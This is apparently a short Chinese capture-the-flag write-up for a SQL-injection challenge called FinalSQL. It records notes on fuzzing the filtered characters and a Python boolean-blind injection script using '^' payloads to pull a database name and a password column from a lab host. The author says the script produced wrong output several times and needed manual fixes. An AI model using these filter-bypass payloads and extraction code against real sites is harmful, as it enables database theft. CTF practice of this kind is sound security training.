- 12345都点过了 访问id=6 提示
Clever! But not this table.
- 这里猜测id这里存在SQL注入,而不是以前的登录框
- 初步判断了一下,是一个数字型注入 且过滤了一些字符 需要fuzz一下
- 空格被过滤掉了用() union注入这些也被过滤的差不都了
- FinalSQL可以想想到应该是盲注类型的题目 嘿嘿嘿
- ^没有被过滤 可以在这里去搞点事情做做
- 题目有提示是盲注 所以这种题目还是跑脚本
import requests
import sys
import time
def get_DBlen(url):
for i in range(1,10):
db_url = url+"1^1^(length(database())=%d)#"%i
r = requests.get(db_url)
if "Click" in r.text:
print("数据库名称的长度为:%d"%i)
return i
def get_DBname(url,length):
DBname = ""
length = length + 1
for i in range(1,length):
Max = 122
Min = 41
Mid = (Max+Min)//2
while Min <= Max:
db_url = url+"1^1^(ascii(substr(database(),%d,1))>=%d)#"%(i,Mid)
r = requests.get(db_url)
if "Click" in r.text:
Min=Mid+1
Mid=(Min+Max)//2
pass
else:
Max = Mid-1
Mid = (Min+Max)//2
pass
pass
DBname = DBname + chr(Mid)
print(DBname)
return DBname
def get_TBname(url):
name=""
i = 0
while True:
i = i+1
Max = 128
Min = 32
Mid = (Max+Min)//2
while Min <= Max:
db_url = url+"1^1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>=%d)"%(i,Mid)
r = requests.get(db_url)
if "Click" in r.text:
Min=Mid+1
Mid=(Min+Max)//2
pass
else:
Max=Mid-1
Mid=(Min+Max)//2
pass
pass
name=name+chr(Mid)
print(name)
if Mid == 31:
break
time.sleep(0.5)
if __name__=="__main__":
url = "http://ff1a7c21-003a-43f1-85ec-8bbd9c55b53a.node3.buuoj.cn/search.php?id="
db_Len = get_DBlen(url)
db_Name = get_DBname(url,db_Len)
tb_name = get_TBname(url)
- 我吐槽一下,这个脚本我跑flag的时候跑错了两三次 最后手改的…
- 改了脚本